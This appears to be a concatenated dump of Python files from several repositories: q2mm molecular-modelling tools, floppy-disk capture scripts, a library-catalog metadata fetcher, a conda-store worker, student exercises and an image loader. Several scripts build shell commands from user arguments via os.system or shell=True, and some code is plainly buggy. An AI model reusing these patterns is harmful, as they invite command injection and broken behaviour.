# print(outfile,"RCA4",rca4)
# print(outfile,"RCA23",rca23)
check = []
for rr in rca4:
check.append(rr[1])
check.append(rr[2])
bond = sorted([rr[1],rr[2]])
if bond in rot_bond:
rot_bond.remove(bond)
if len(check) != len(set(check)):
print("\t\tBAD",outfile)
print("\t\t",rca4)
# else:
# print("\t\tBAD",outfile)
# print(outfile,"ROT", rot_bond)
conv.WriteFile(mol, outfile)
return chiral, rca4, rot_bond
def to_mol2(infile,outfile):
conv = ob.OBConversion()
conv.SetInAndOutFormats("sdf","mol2")
mol = ob.OBMol()
conv.ReadFile(mol, infile)
conv.WriteFile(mol, outfile)
def add_pd(infile,outfile):
conv = ob.OBConversion()
conv.SetInAndOutFormats("mol2","mol2")
mol = ob.OBMol()
conv.ReadFile(mol, infile)
nAtoms = mol.NumAtoms()
p = []
for i in range(nAtoms):
n = i + 1
at = mol.GetAtom(n)
an = (at.GetAtomicNum())
if an == 15:
p.append(n)
elif an == 8:
# Oxygen
neis = []
for nei in ob.OBAtomAtomIter(at):
neis.append(nei)
# Oxygen has one neighbor
lnei = len(neis)
if lnei == 1:
nei = neis[0]
# neighbor is P (i.e. P=O)
if nei.GetAtomicNum() == 15:
return None
if len(p) != 2:
return None
# optimize for P-P distance first
p1, p2 = p
cons = ob.OBFFConstraints()
pp = 3.2
cons.AddDistanceConstraint(p1, p2, pp)
# Set up FF
ff = ob.OBForceField.FindForceField("UFF")
ff.Setup(mol, cons)
ff.SetConstraints(cons)
ff.EnableCutOff(True)
# Optimize
ff.ConjugateGradients(10000)
ff.GetCoordinates(mol)
cont = True
while cont:
pho1 = mol.GetAtom(p1)
pho2 = mol.GetAtom(p2)
pp1 = pho1.GetDistance(pho2)
err0 = abs(pp1-pp)
if err0 < 0.015:
cont = False
else:
print("\tNOT converged YET:",outfile, " diff:", err0)
ff.ConjugateGradients(10000)
ff.GetCoordinates(mol)
p = []
pxyz = []
nxyz = []
# find out where two P are located
for i in range(nAtoms):
n = i + 1
at = mol.GetAtom(n)
an = (at.GetAtomicNum())
if an == 15:
p.append(n)
pxyz.append([at.x(),at.y(),at.z()])
else:
nxyz.append([at.x(),at.y(),at.z()])
nxyz = np.array(nxyz)
# Add Pd and connect it to two Ps
a = mol.NewAtom()
a.SetAtomicNum(46)
pxyz = np.array(pxyz)
x,y,z = (pxyz[0] + pxyz[1])/2
pdxyz = np.array([x,y,z])
vec0 = None
r0 = 100.0
for vec in nxyz:
vec = vec - pdxyz
r = np.linalg.norm(vec)
if r < r0:
r0 = r
vec0 = vec
x,y,z = pdxyz-10.0*vec0
a.SetVector(x,y,z)
# AddBond(BeginIdx,EndIdx,bond order)
pd = mol.NumAtoms()
p1,p2 = p
mol.AddBond(pd,p1,1)
mol.AddBond(pd,p2,1)
mol.NumAtoms()
conv.WriteFile(mol, outfile)
return [p1,p2,pd]
def sdf_to_mae(filenames):
for fn0 in filenames:
fn = fn0.replace(".sdf","")
# print("reading {}".format(fn))
to_mol2(fn0,"{}.0temp".format(fn))
index = add_pd("{}.0temp".format(fn),"{}.temp".format(fn))
if index != None:
chiral, rca4, rot = cons_opt("{}.temp".format(fn),"{}.mol2".format(fn),index)
print("molecule ",fn, "finished")
os.system("mv {}.mol2 ../mol2/".format(fn))
os.system("mol2convert -imol2 ../mol2/{}.mol2 -omae ../maes/{}.mae".format(fn,fn))
os.system("echo 'CHIRAL {}\nRCA4 {}\n ROT {}' >> ../maes/{}.mae".format(chiral, rca4,rot,fn))
return 0
# Get the list of sdf files in current directory
# for loop all
os.system("mkdir ./mol2")
os.system("mkdir ./maes")
os.chdir("./sdf")
if 1:
fns = glob.glob("*.sdf")
# number of threads for parallel job
nt = 32
lf = len(fns)
nj = int(lf/nt)
nr = int(lf%nt)
ni = 0
count = 0
file_split=[]
for i in range(nt-1):
fn = fns[ni:ni+nj]
file_split.append(fn)
count += len(fn)
ni = ni + nj
for i in range(nr):
file_split[i].append(fns[ni+i])
with Pool(processes=nt) as pool:
multiple_jobs = [pool.apply_async(sdf_to_mae,(files,)) for files in file_split]
[res.get() for res in multiple_jobs]
```
#### File: q2mm/tools/submit.py
```python
9#!/usr/bin/env python
import argparse
import sys
import os
import subprocess as sp
DEFAULT_SUB_FILE = '''#!/bin/csh
#$ -M <EMAIL>
#$ -m ae
#$ -N {}
#$ -q {}
#$ -r n
{}
module load schrodinger/2015u3
module load gaussian/09D01
module load tinker
setenv SCHRODINGER_TEMP_PROJECT "~/.schrodtmp"
setenv SCHRODINGER_TMPDIR "~/.schrodtmp"
setenv SCHRODINGER_JOBDB2 "~/.schrodtmp"
{}'''
#Change the default user here
defaultuser='arosale4'
def CRC_qsub(job_name,USER,QUEUE,CPU,COMMAND):
## Writes the submission file with all the appropriate options: job name,
## queue, processors, and the job command.
submission_file = open(job_name + '.sh', 'w')
submission_file.write(
DEFAULT_SUB_FILE.format(job_name,USER,QUEUE,CPU,COMMAND.format(
job_name + '.com')))
submission_file.close()
def queue(opts):
## Queue option of the crc. I think I can only use long and debug, which
## long is the default.
if opts.queue:
QUEUE = opts.queue
else:
QUEUE = 'long'
return QUEUE
def processors(opts):
## Sets the number of processors to request from the CRC. Default is to use
## 8 processors. When there is no argument to follow ("-pe") then this
## section is removed to allow for only one processor. An additional
## argument will just write that argument, e.g. "-pe -pe smp 16" would add
## #$ -pe smp 16 to the submission script.
if opts.processors == 'default':
CPU = '#$ -pe smp 8'
elif opts.processors == 'none':
CPU = ' '
else:
CPU = '#$ ' + opts.processors
return CPU
def command(opts):
## Sets the actuall command to accomplish. By default it will do a gaussian
## job. Example of an alternative is "--command bmin -WAIT conf_search"
if opts.command:
COMMAND = opts.command
else:
COMMAND = 'g09 {}'
return COMMAND
def main(args):
parser = return_parser()
opts = parser.parse_args(args)
QUEUE = queue(opts)
CPU = processors(opts)
COMMAND = command(opts)
if opts.username:
USER = opts.username
else:
USER = defaultuser
for filename in opts.filename:
run_file = os.path.splitext(filename)[0]
CRC_qsub(run_file,USER,QUEUE,CPU,COMMAND)
sp.call('qsub {}.sh'.format(run_file), shell=True)
# print('This is where you would run the following command')
# print('>>>>> qsub {}.sh'.format(run_file))
def return_parser():
parser = argparse.ArgumentParser(
description='To fill out later')
parser.add_argument(
'filename', type=str, nargs='+', help='Filename')
parser.add_argument(
'-q','--queue', type=str, help='"long" or "debug"')
parser.add_argument(
'-pe','--processors', type=str, nargs='?', const='none',
default='default', help='No option string = default smp 8; \n'
'Option string but no argument = no multiple processing; and \n'
'Option string with argument = "#$" + argument')
parser.add_argument(
'-c','--command', type=str, help='Command that are being ran. The \
default will be to perform a g09 calcualtion on #')
parser.add_argument(
'-u','--username', type=str, help='<NAME> CRC user name. Probably \
a NetID.')
return parser
if __name__ == '__main__':
main(sys.argv[1:])
##################################
```
#### File: q2mm/tools/sumq.py
```python
from __future__ import print_function
import argparse
import os
import re
import sys
from itertools import chain
from math import exp, log
K = 0.008314459848 # kJ K^-1 mol^-1
ENERGY_LABEL = 'r_mmod_Potential_Energy-MM3*'
RE_ENERGY = ('(\s|\*)Conformation\s+\d+\s\(\s+(?P<energy>[\d\.\-]+)\s+kJ/mol\) '
'was found\s+(?P<num>[\d]+)')
HARTREE_TO_KJMOL = 2625.5 # Hartree to kJ/mol
def read_energy_from_macro_log(filename,
max_structures=None,
max_energy=None):
energies = []
with open(filename, 'r') as f:
energy_section = False
for line in f:
if '*** MC Statistics ***' in line:
energy_section = False
if 'Total number of structures processed =' in line:
num_str = int(line.split()[6])
energy_section = True
if energy_section:
matched = re.match(RE_ENERGY, line)
if matched != None:
energy = float(matched.group('energy'))
num = int(matched.group('num'))
if max_energy and len(energies) > 0:
# Inefficient.
zero = min(energies)
if energy - zero > max_energy:
break
# print(energy)
energies.append(energy)
# Thought I'd try this out. Doesn't really work.
# Idea was that it would append the energy * the number of
# times that the conformation was located. Didn't really
# change things much.
# Anyway, reasoning for this was that we're really trying
# to explore how soft or hard the PES surface about the TS
# is. Many mid energy conformers may mean more than few
# slightly lower energy conformers.
# energies.extend([energy] * num)
if max_structures:
if len(energies) == max_structures:
break
return energies
def read_energy_from_mae(filename):
"""
Reads energies from *.mae files.
Energies are read and saved as kJ/mol.
"""
path_of_this_file = os.path.dirname(os.path.realpath(__file__))
path_of_q2mm = os.path.join(path_of_this_file, '../q2mm')
sys.path.append(path_of_q2mm)
import filetypes
mae = filetypes.Mae(filename)
energies = [float(x.props[ENERGY_LABEL]) for x in mae.structures]
return energies
def read_energy_from_gau_log(filename):
"""
Reads energies from *.log Gaussian files.
Also converts Hartrees to kJ/mol for saving.
"""
path_of_this_file = os.path.dirname(os.path.realpath(__file__))
path_of_q2mm = os.path.join(path_of_this_file, '../q2mm')
sys.path.append(path_of_q2mm)
import filetypes
# This is actually a little misleading seeing as these archives only contain
# one HF energy, and typically each file only contains one archive.
energies = []
file_ob = filetypes.GaussLog(filename)
try:
file_ob.read_archive()
for structure in file_ob.structures:
energies.append(float(structure.props['HF']) * HARTREE_TO_KJMOL)
return energies
except IndexError:
raise
def make_relative(energies):
"""
Makes all energies relative.
Expects a list of lists, flattens it, finds the minimum, makes all energies
in all lists relative.
Returns
-------
list of lists of floats
"""
zero = min(chain.from_iterable(energies))
zero_energies = []
for group_energies in energies:
zero_energies.append([x - zero for x in group_energies])
return zero_energies
def return_parser():
parser = argparse.ArgumentParser(
description=__doc__, formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument(
'-g', '--group', metavar='filename',
type=str, nargs='+', action='append',
help='Group of filenames.')
parser.add_argument(
'-n', '--max_structures', metavar='i',
type=int,
help='Stop reading an individual file after reading i structures.')
parser.add_argument(
'-m', '--max_energy', metavar='f',
type=float,
help="Don't read any structures that have a relative energy above f.")
parser.add_argument(
'-a', '--appendfile', metavar='filename',
type=str,
help='Also append CSV style output to a file.')
parser.add_argument(
'-t', '--temperature', type=float, default=298.15,
help='Self-explanatory. Default is 298.15 K.')
return parser
def calc_q(energies, temperature=298.15):
# Beta
beta = 1 / (K * temperature)
qs = []
for group_energies in energies:
q = sum([exp(-beta*x) for x in group_energies])
qs.append(q)
return qs
def sumq(groups,
appendfile=None,
max_energy=None,
max_structures=None,
temperature=298.15):
# list of lists
# Each sublist contains all the energies for a grouping of
# structures/filenames.
energies = []
# Get all the partition function values.
for group in groups:
group_energies = []
for filename in group:
if filename.endswith('.log'):
# Need system for handling both types of .log files.
try:
e = read_energy_from_gau_log(filename)
except IndexError:
e = read_energy_from_macro_log(
filename,
max_structures=max_structures,
max_energy=max_energy)
group_energies.extend(e)
elif filename.endswith('.mae'):
e = read_energy_from_mae(filename)
group_energies.extend(e)
energies.append(group_energies)
e1 = energies[0][0]
e2 = energies[1][0]
energies = make_relative(energies)
# Output code.
border = ' % CONTRIBUTION TO TOTAL '.center(50, '-')
print(border)
qs = calc_q(energies, temperature=temperature)
total_q = sum(qs)
stuff = []
for i, q in enumerate(qs):
ratio = q / total_q
print('Group {}: {}'.format(i + 1, ratio))
stuff.append(ratio)
# Additional output for when there are only 2 isomers.
print(' OUTPUT FOR 2 GROUPS '.center(50, '-'))
if len(qs) == 2:
dr12 = qs[0] / qs[1]
dr21 = qs[1] / qs[0]
# Changing sign temporarily.
de = - (dr12 - 1) / (dr12 + 1) * 100
dde = K * temperature * log(qs[0]/qs[1])
print('% dr/er (Group 1 : Group 2): {}'.format(dr12))
print('% dr/er (Group 2 : Group 1): {}'.format(dr21))
print('% de/ee: {}'.format(de))
print('ddE (kJ/mol): {}'.format(abs(dde)))
if appendfile:
with open(appendfile, 'a') as f:
names1 = ' '.join(groups[0])
names2 = ' '.join(groups[1])
f.write('{},{},{},{},{},{},{},{}\n'.format(
names1,
names2,
e1,
e2,
dr12,
dr21,
de,
dde))
print('-' * len(border))
print('This should equal 1: {}'.format(sum(stuff)))
def main(args):
parser = return_parser()
opts = parser.parse_args(args)
sumq(opts.group,
opts.appendfile,
opts.max_energy,
opts.max_structures,
opts.temperature)
if __name__ == '__main__':
args = sys.argv[1:]
main(args)
```
|
{
"source": "jesswhyte/floppycapture",
"score": 3
}
|
#### File: jesswhyte/floppycapture/floppy-nocall.py
```python
import sys
import argparse
import os
import subprocess as subproc
import datetime
import re
#######################
###### ARGUMENTS ######
#######################
parser = argparse.ArgumentParser(
description ="Script to walk through floppy disk capture workflow, Jan 2018")
parser.add_argument(
'-c', '--collection', type=str,
help='collection/accession/box/whatever',
required=True)
parser.add_argument(
'-d','--dir', type=str,
help='Start directory, e.g. /home/jess/CAPTURED', required=True)
parser.add_argument(
'-i','--i4',action='store_true',
help='use flag to default to i4/MFM')
parser.add_argument(
'-m', '--mediatype', type=str,
help='Use \"3.5\" or \"5.25\"',required=True,
choices=['3.5','5.25'])
parser.add_argument(
'-t', '--transcript', type=str,
help='Transcript of label', required=False)
parser.add_argument(
'-n','--note', type=str,
help='capture notes', required=False)
parser.add_argument(
'-k', '--key',type=str,
help='diskID',required=True)
## Array for all args passed to script
args = parser.parse_args()
###############################
########## VARIABLES ##########
###############################
drive = "d0"
date = datetime.datetime.today().strftime('%Y-%m-%d')
collection = args.collection
mediaType = args.mediatype
key = args.key
dir = args.dir
note=args.note
if args.transcript:
label = args.transcript
else:
label = "no disk label"
#################################
########## CLASS STUFF ##########
#################################
# font colors, visit https://gist.github.com/vratiu/9780109 for a nice guide to the color codes
class bcolors:
OKGREEN = '\033[92m' #green
INPUT = '\033[93m' #yellow, used for when user input required
FAIL = '\033[91m' #red, used for failure
ENDC = '\033[0m' # end color
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
GREENBLOCK = '\x1b[1;31;40m' # green with background, used for updates user should check (e.g. Title/Cat report)
ENDGB = '\x1b[0m' #end x1b block
####################################
############ FUNCTIONS #############
####################################
### TODO: rewrite kfStream as subprocess, temp)
def kfStream():
os.system(
"dtc -"+drive+" -fstreams/"+key+"/"
+key+"_stream -i0 -i4 -i9 -i2 -t2 -l8 -p | tee "
+outputPath+key+"_capture.log")
#takes existing stream, attemps to make image based on given fileSystem
def kfImage(fileSystem):
os.system(
"dtc -fstreams/"+key+"/"
+key+"_stream00.0.raw -i0 -f"+outputPath+key+"_disk.img -"
+fileSystem+" -m1")
#Takes preservation stream + attempts to create i4 or MFM disk image
def kfi4():
os.system(
"dtc -"+drive+" -fstreams/"+key+"/"
+key+"_stream -i0 -f"+outputPath+key+
"_disk.img -i4 -t1 -l8 -p | tee "+outputPath+key+"_capture.log")
########################
##### THE GOODS ######
########################
### check Media, set drive
if mediaType == "3.5":
drive = "d0"
elif mediaType == "5.25":
drive = "d1"
### Change working directory
if not os.path.exists(dir):
os.makedirs(dir)
os.chdir(dir)
### Create directory for output if it doesn't exist
outputPath = collection+"/"+key+"/"
### JW NOTE: Check if os.path exists and then ask whether or not to proceed and how
if os.path.exists(outputPath):
replacePath = input(bcolors.INPUT+"path already exists, proceed anyway y/n? "+bcolors.ENDC)
if replacePath.lower() == 'y' or replacePath.lower() == 'yes':
# replaceStream only an option, because sometimes I want to keep original photo/metadata, but want to try # replacing what might have been a previously unsuccessful capture, e.g. if there is another copy of disk
replaceStream = input(bcolors.INPUT+"Replace stream/image **ONLY** y/n? "+bcolors.ENDC)
if replaceStream.lower() == 'y' or replaceStream.lower() == 'yes':
go = input(bcolors.INPUT+"Please insert disk and hit Enter"+bcolors.ENDC)
if args.i4:
kfi4()
else:
kfStream()
fileSystem = input(bcolors.INPUT+"Which filesytem? "+bcolors.ENDC)
kfImage(fileSystem)
sys.exit("-Stream/image replaced. No other entries updated. Exiting...")
if replaceStream.lower() == 'n' or replaceStream.lower() =='no':
replaceStream == 'no'
print(bcolors.OKGREEN+"Replacing "+key+" ..."+bcolors.ENDC)
if replacePath.lower() == 'n' or replacePath.lower() == 'no':
sys.exit("-No entries updated. Exiting...")
if not os.path.exists(outputPath):
os.makedirs(outputPath)
### CAMERA - TAKE A PICTURE - VERY ENV SPECIFIC TO MY CAMERA
photoPrompt = input("Do you want to photograph the disk? (Warning: requires /dev/video0 device connected) [y/n]")
if photoPrompt == "y":
picName = key + ".jpg"
picParameters = " -f video4linux2 -s 1600x1200 -i /dev/video0 -ss 0:0:6 -frames 1 -hide_banner -loglevel panic "+outputPath+picName
gopic = input(bcolors.INPUT+"Please place disk for picture and hit Enter"+bcolors.ENDC)
print("Wait please...taking picture...")
os.system("ffmpeg"+picParameters)
### Double check pic worked and warn if it didn't:
if os.path.exists(
outputPath+picName):
print("-Pic: %s%s taken" % (outputPath,picName))
else:
print(bcolors.FAIL+"-Pic: %s%s NOT TAKEN. CHECK CAMERA + FFMPEG SETTINGS" % (outputPath,picName))
### KRYOFLUX - GET A PRESERVATION STREAM
## Pause and give user time to put disk in
go = input(bcolors.INPUT+"Please insert disk and hit Enter"+bcolors.ENDC)
## take the stream only if it doesn't already exist
## note: streams do not go in diskID directory
if os.path.exists("streams/"+key+"/"+key+"_stream00.0.raw"):
replaceStream = input(bcolors.INPUT+"streams/"+key+"/"+key+"_stream00.0.raw exists, replace y/n? "+bcolors.ENDC)
if replaceStream.lower() == 'y' or replaceStream.lower() == 'yes':
if args.i4:
kfi4()
else:
kfStream()
fileSystem = input(bcolors.INPUT+"Which filesytem? "+bcolors.ENDC)
kfImage(fileSystem)
else:
# if replaceStream=N, still ask if user wants to update metadata/master log
replaceMeta = input(bcolors.INPUT+"replace metadata and create new log entry y/n? "+bcolors.ENDC)
if replaceMeta.lower() == 'n' or replaceMeta.lower() == 'no':
# if replaceMeta=N, close out and exit, otherwise carry on
metadata.close()
sys.exit ("-Exiting...")
else:
if args.i4:
# take preservation stream and MFM image at same time
kfi4()
else:
# take preservation stream, then ask which filesystem, e.g. i9 or i4, etc.
kfStream()
fileSystem = input(bcolors.INPUT+"Which filesytem? "+bcolors.ENDC)
if not os.path.exists(outputPath+"_disk.img"):
# create image from stream, based on provided filesystem
kfImage(fileSystem)
#########################################
#### END MATTER and METADATA UPDATES ####
#########################################
### Update master log
## TODO: this should really use csv library, I was lazy
## User asked if they'd like to update the notes they entered
noteupdate = input(bcolors.INPUT+"If you would like to update the disk notes (currently: "+bcolors.OKGREEN+str(note)+bcolors.ENDC+bcolors.INPUT+"), please re-enter, otherwise hit Enter: "+bcolors.ENDC)
if noteupdate:
note = noteupdate
print("-Note has been updated to: " + bcolors.OKGREEN + str(note) + bcolors.ENDC)
else:
note = "No-transcript"
print("-Note unchanged...")
## Open and update the masterlog - projectlog.csv
log = open('projectlog.csv','a+')
print("-Updating log...")
log.write(
"\n"+collection+","+key+","+mediaType+
","+"\""+label+"\",\""+str(note)+"\"")
if os.path.exists(
outputPath+key+"_disk.img"):
log.write(",img=OK")
else:
log.write(",img=NO")
log.write(","+date)
### Close master log
log.close()
sys.exit ("-Exiting...to extract logical files from your disk images and generate .csv manifests, please run disk-img-extraction.sh on collection directory")
```
#### File: floppycapture/helpers/getcall.py
```python
import sys
import argparse
import os
import subprocess as subproc
import json
import urllib
import re
from urllib.request import urlopen
from collections import OrderedDict
###### ARGUMENTS ######
parser = argparse.ArgumentParser(
description ="Script to convert catkey to callnum for, say, filenames. Usage python3 getcall.py <catkey>")
parser.add_argument(
'-k', '--key', type=str,
help='catkey', required=True)
## Array for all args passed to script
args = parser.parse_args()
catKey = args.key
def get_json_data(url):
response = urlopen(url)
data = response.read().decode()
return json.loads((data), object_pairs_hook=OrderedDict)
### do a catalog call based on the catkey
catUrl = str("https://search.library.utoronto.ca/details?%s&format=json" % catKey) #set catalog search url based on catkey
# make a dictionary out of the response from catUrl
cat_dic = get_json_data(catUrl) #run get_json_data function using catUrl)
title = cat_dic['record']['title'] #set the $title variable based on record.title in json
callnumber = cat_dic['record']['holdings']['items'][0]['callnumber']
#print(callnumber) ## if you want to print original call number
#callnumber = callnumber.replace('.','-') ## if you wanted to replace dots with dashes
callnumber = callnumber.replace(' ','_')
print(callnumber)
sys.exit (0) #exit
```
#### File: floppycapture/helpers/metadata.py
```python
import sys
import argparse
import os
import subprocess as subproc
import datetime
import json
import urllib
import re
from urllib.request import urlopen
from collections import OrderedDict
#######################
###### ARGUMENTS ######
#######################
parser = argparse.ArgumentParser(
description ="Script to pull catalog metadata, remove holdings info (e.g. checkout status), end add processing metadata (e.g. date processed)")
parser.add_argument(
'-l', '--lib', type=str,
help='Library, for a list of library IDs, visit ufot.me/libs ',
required=True,
choices=['ARCH','ART','ASTRO','CHEM','CRIM',
'DENT','OPIRG','EARTH','EAL','ECSL','FCML',
'FNH','GERSTEIN','INFORUM','INNIS','KNOX',
'LAW','MDL','MATH','MC','PONTIF','MUSIC',
'NEWCOLLEGE','NEWMAN','OISE','PJRC','PHYSICS',
'REGIS','RCL','UTL','ROM','MPI','STMIKES',
'TFRBL','TRIN','UC','UTARMS','UTM','UTSC','VIC'])
parser.add_argument(
'-m', '--mediatype', type=str,
help='Use \"3.5\" or \"5.25\" or \"CD\" or \"USB\"',required=True,
choices=['3.5','5.25', 'CD', 'USB'])
parser.add_argument(
'-k', '--key', type=str,
help='catkey', required=False)
## Array for all args passed to script
args = parser.parse_args()
###############################
########## VARIABLES ##########
###############################
date = datetime.datetime.today().strftime('%Y-%m-%d') # set's today's date as $date variable
lib = args.lib
mediaType = args.mediatype
catKey = args.key
####################################
############ FUNCTIONS #############
####################################
# Get json from a URL (we're going to use keyURL), read and decode the response and then put in ordered dictionary
def get_json_data(url):
response = urlopen(url)
data = response.read().decode()
return json.loads((data), object_pairs_hook=OrderedDict)
########################
##### THE GOODS ######
########################
### do a catalog call based on the catkey
catUrl = str("https://search.library.utoronto.ca/details?%s&format=json" % catKey) #set catalog search url based on catkey
# make a dictionary out of the response from catUrl
cat_dic = get_json_data(catUrl) #run get_json_data function using catUrl)
title = cat_dic['record']['title'] #set the $title variable based on record.title in json
imprint = cat_dic['record']['imprint'] #set the $imprint variable
catkey = cat_dic['record']['catkey'] #set the $catkey variable
description = cat_dic['record']['description'] #set the $description variable
## Create dictionary of capture data to add to json metadata
capture_dic = {
'disk':{
'CaptureDate': date,
'media': mediaType,
'library': lib}
}
## delete holdings info (e.g. checkout info) from cat_dic
del cat_dic['record']['holdings']
## add capture dictionary to cat_dic dictionary
cat_dic.update(capture_dic)
## dump resulting json to stdout/screen:
json.dump(cat_dic, sys.stdout, indent=4) ## outputs json dump of created dictionary to system sydout, indented, can pipe to file or screen
print() #line break
sys.exit (0) #exit
```
|
{
"source": "jess-x/conda-store",
"score": 2
}
|
#### File: conda_store_server/worker/app.py
```python
import logging
from traitlets import Unicode, Integer, List
from traitlets.config import Application
from conda_store_server.app import CondaStore
class CondaStoreWorker(Application):
aliases = {
"config": "CondaStoreWorker.config_file",
}
log_level = Integer(
logging.INFO,
help="log level to use",
config=True,
)
watch_paths = List(
[], help="list of paths to watch for environment changes", config=True
)
config_file = Unicode(
"conda_store_config.py", help="config file to load for conda-store", config=True
)
def initialize(self, *args, **kwargs):
super().initialize(*args, **kwargs)
self.load_config_file(self.config_file)
@property
def conda_store(self):
if hasattr(self, "_conda_store"):
return self._conda_store
self._conda_store = CondaStore(parent=self, log=self.log)
return self._conda_store
def start(self):
argv = [
"worker",
"--loglevel=INFO",
"--beat",
]
self.conda_store.ensure_directories()
self.conda_store.celery_app.worker_main(argv)
```
|
{
"source": "Jessy777-cripto/fundamentals-of-computational-issues",
"score": 3
}
|
#### File: fundamentals-of-computational-issues/hash-table/main.py
```python
def hashfunc_insert(k, i=0):
t = k%qtd_cont
if containers[t][i] == None:
containers[t][i] = k
else: #se o container estiver ocupado, vai para o próximo espaço.
hashfunc_insert(k, i+1)
def hashfunc_search(k, i=1):
t = k%qtd_cont
if i == tam_cont:
return comp_key.append(i)
if containers[t][i-1] == k or containers[t][i-1] == None :
comp_key.append(i)
else:
hashfunc_search(k, i+1)
qtd_cont, tam_cont, qtd_in, *n = map(int, input().split(' '))
containers = [[None]*tam_cont for i in range (qtd_cont)]
comp_key = [] #qtd de comparações durante a busca na tabela hash
in_data=[n[i] for i in range(qtd_in)] #dados a serem incluidos na tabela hash
rest = n[qtd_in:] #dados a serem procurados após a inserção da tabela hash
for d in range(len(in_data)): #inserção de chaves
hashfunc_insert(in_data[d])
for r in range(len(rest)): #busca na tabela hash
hashfunc_search(rest[r])
for i in range(len(comp_key)):
print(comp_key[i], end=' ')
```
#### File: fundamentals-of-computational-issues/library/main.py
```python
class Livro:
codigo = None
nome = None
autor = None
__qtdeAlugueis = 0
def __init__(self, codigo, nome, autor):
self.codigo = codigo
self.nome = nome
self.autor = autor
def incrementaAluguel(self):
self.__qtdeAlugueis += 1
def getQtdeAlugueis(self):
return self.__qtdeAlugueis
class Biblioteca:
alugados = []
disponiveis = []
def inserir(self, livro):
self.disponiveis.append(livro)
def alugar(self, livro):
ok = True
mensagem = None
if livro in self.disponiveis:
for i in self.disponiveis:
if i == livro:
i.incrementaAluguel()
self.alugados.append(i)
self.disponiveis.remove(i)
break
elif livro in self.alugados:
ok = False
mensagem = "O livro ja esta alugado, infelizmente voce nao podera alugar"
else:
ok = False
mensagem = "O livro nao existe"
return (ok, mensagem)
def devolver(self, codLivro):
ok = True
mensagem = None
for livro in self.alugados:
if livro.codigo == codLivro:
self.disponiveis.append(livro)
self.alugados.remove(livro)
break
else:
ok = False
mensagem = "O livro nao esta alugado"
return (ok, mensagem)
def livroMaisAlugado(self):
ok = True
mensagem = None
maior = 0
nome = None
for livro in self.disponiveis:
if livro.getQtdeAlugueis() > maior:
maior = livro.getQtdeAlugueis()
nome = livro.nome
for livro in self.alugados:
if livro.getQtdeAlugueis() > maior:
maior = livro.getQtdeAlugueis()
nome = livro.nome
if maior == 0:
ok = False
mensagem = "Nenhum livro foi alugado ainda"
else:
mensagem = "O livro mais alugado e: %s (%d alugueis)"%(nome, maior)
return (ok, mensagem)
def livrosOrdenadosPeloNome(self):
listas = [self.disponiveis, self.alugados]
lista_geral = []
for l in listas:
troca = True
while troca:
p = len(l)-1
troca = False
for i in range(p):
if l[i].nome>l[i+1].nome:
l[i], l[i+1]= l[i+1], l[i]
troca = True
i= 0
j = 0
while True:
if i==len(self.disponiveis):
for n in range(self.alugados.index(self.alugados[j]), len(self.alugados)-self.alugados.index(self.alugados[j])):
print(self.alugados[n].codigo, end=' ')
lista_geral.append(self.alugados[n].codigo)
break
elif j == len(self.alugados):
for n in range(self.disponiveis.index(self.disponiveis[i]), len(self.disponiveis)-self.disponiveis.index(self.disponiveis[i])):
print(self.disponiveis[n].codigo, end=' ')
lista_geral.append(self.disponiveis[n].codigo)
break
if self.disponiveis[i]<self.alugados[j]:
lista_geral.append(self.disponiveis[i].codigo)
i+=1
else:
lista_geral.append(self.alugados[j].codigo)
j+=1
class Main:
b = Biblioteca()
q_l, *v = input().split(',')
j = 0
for livro in range(int(q_l)):
lv = Livro(v[j], v[j+1], v[j+2])
b.inserir(lv)
j+=int(q_l)
b.livrosOrdenadosPeloNome()
```
|
{
"source": "je-ss-y/abaturanyi",
"score": 2
}
|
#### File: abaturanyi/ibiro/views.py
```python
from django.shortcuts import render
from django.http import HttpResponse
from .models import Location
from django.contrib.auth.decorators import login_required
from django.contrib.auth.models import User
from .forms import ProfileForm,PostForm
# Create your views here.
@login_required(login_url='/accounts/login/')
def new_post(request):
current_user = request.user
if request.method == 'POST':
form = PostForm(request.POST, request.FILES)
if form.is_valid():
post = form.save(commit=False)
# post.user = current_user
post.save()
return redirect('postsToday')
else:
form = PostForm()
return render(request, 'all-posts/newpost.html', {"form": form})
@login_required(login_url='/accounts/login/')
def posts_of_day(request):
current_user = request.user
snap = Snap.objects.all()
return render(request, 'all-posts/poststoday.html', {"snap":snap})
@login_required(login_url='/accounts/login/')
def welcome(request):
location = Location.objects.all()
return render(request, 'all-posts/welcome.html',{"location":location})
def search_results(request):
if 'username' in request.GET and request.GET["username"]:
search_term = request.GET.get("username")
searched_users= Image.search_by_name(search_term)
message = f"{search_term}"
return render(request, 'all-posts/search.html',{"searched_users": searched_users})
else:
message = "You haven't searched for any term"
return render(request, 'all-posts/search.html',{"message":message})
@login_required(login_url='/accounts/login/')
def profile_form(request):
current_user = request.user
if request.method == 'POST':
form = ProfileForm(request.POST, request.FILES)
if form.is_valid():
profile = form.save(commit=False)
profile.user = current_user
profile.save()
return redirect('profile')
else:
form = ProfileForm()
return render(request, 'all-posts/profile.html', {"form": form})
@login_required(login_url='/accounts/login/')
def user_profile(request):
current_user = request.user
# snap = Snap.objects.filter(user=current_user)
profilepicture=Profile.objects.get(user=current_user)
return render(request, 'all-posts/profiledisplay.html', {"profilepicture": profilepicture})
```
|
{
"source": "jessychen1016/DPCN",
"score": 3
}
|
#### File: DPCN/data/data_utils.py
```python
from torch.utils.data import Dataset, DataLoader
from torchvision import transforms, utils
import pandas as pd
from pandas import Series,DataFrame
import numpy as np
import torch
import os
import cv2
from PIL import Image
import matplotlib.pyplot as plt
import sys
import os
sys.path.append(os.path.abspath(".."))
from utils.utils import *
def default_loader(path, resize_shape, change_scale = False):
trans = transforms.Compose([
transforms.ToTensor(),
# transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]) # imagenet
])
image = cv2.imread(path)
image = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)
(h_original, w_original) = image.shape
image = cv2.resize(image, dsize=(resize_shape,resize_shape), interpolation=cv2.INTER_CUBIC)
angle = (np.random.rand()-0.5) * 0.
angle += 180.
angle %= 360
angle -= 180.
(h, w) = image.shape
(cX, cY) = (w//2, h//2)
t_x = np.random.rand() * 0.
t_y = np.random.rand() * 0.
translation = np.array((t_y, t_x))
# arr = arr[0,]
# rot = ndii.rotate(arr, angle)
# N = np.float32([[1,0,t_x],[0,1,t_y]])
# image = cv2.warpAffine(image, N, (w, h))
# M = cv2.getRotationMatrix2D((cX, cY), angle, 1.0)
